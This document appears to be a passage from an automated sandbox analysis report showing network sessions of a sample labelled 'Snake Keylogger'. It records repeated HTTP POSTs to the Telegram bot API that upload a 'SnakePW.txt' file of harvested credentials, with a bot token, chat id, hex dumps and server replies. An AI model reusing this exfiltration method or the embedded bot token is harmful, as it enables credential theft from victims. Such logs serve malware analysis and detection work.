                            Data Ascii: {"ok":true,"result":{"message_id":66989,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228850,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            215192.168.2.550119149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:10 UTC363OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570b7ad4f1
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:10 UTC363OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 62 37 61 64 34 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570b7ad4f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:11 UTC363INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:11 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:11 UTC364INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66990,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228851,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            216192.168.2.550124149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:12 UTC364OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570bfdf55c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:12 UTC365OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 62 66 64 66 35 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570bfdf55cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:12 UTC365INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:12 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:12 UTC365INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66992,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228852,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            217192.168.2.550126149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:12 UTC366OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570c5fb674
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:12 UTC366OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 63 35 66 62 36 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570c5fb674Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:12 UTC367INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:12 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:12 UTC367INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66993,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228852,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            218192.168.2.550128149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:12 UTC368OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570c9db3f6
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:12 UTC368OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 63 39 64 62 33 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570c9db3f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:13 UTC368INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:13 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:13 UTC369INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66995,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228853,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            219192.168.2.550129149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:13 UTC369OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570cdbaffa
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:13 UTC370OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 63 64 62 61 66 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570cdbaffaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:13 UTC370INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:13 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:13 UTC371INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66996,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228853,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            22192.168.2.549790149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:47 UTC37OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d9a700e3
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:47 UTC37OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 39 61 37 30 30 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d9a700e3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:47 UTC37INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:47 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:47 UTC38INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66769,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228767,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            220192.168.2.550130149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:13 UTC371OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570d174be5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:13 UTC371OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 64 31 37 34 62 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570d174be5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:14 UTC372INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:13 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:14 UTC372INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66997,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228853,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            221192.168.2.550131149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:14 UTC373OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570d554840
                            Host: api.telegram.org
                            Content-Length: 504
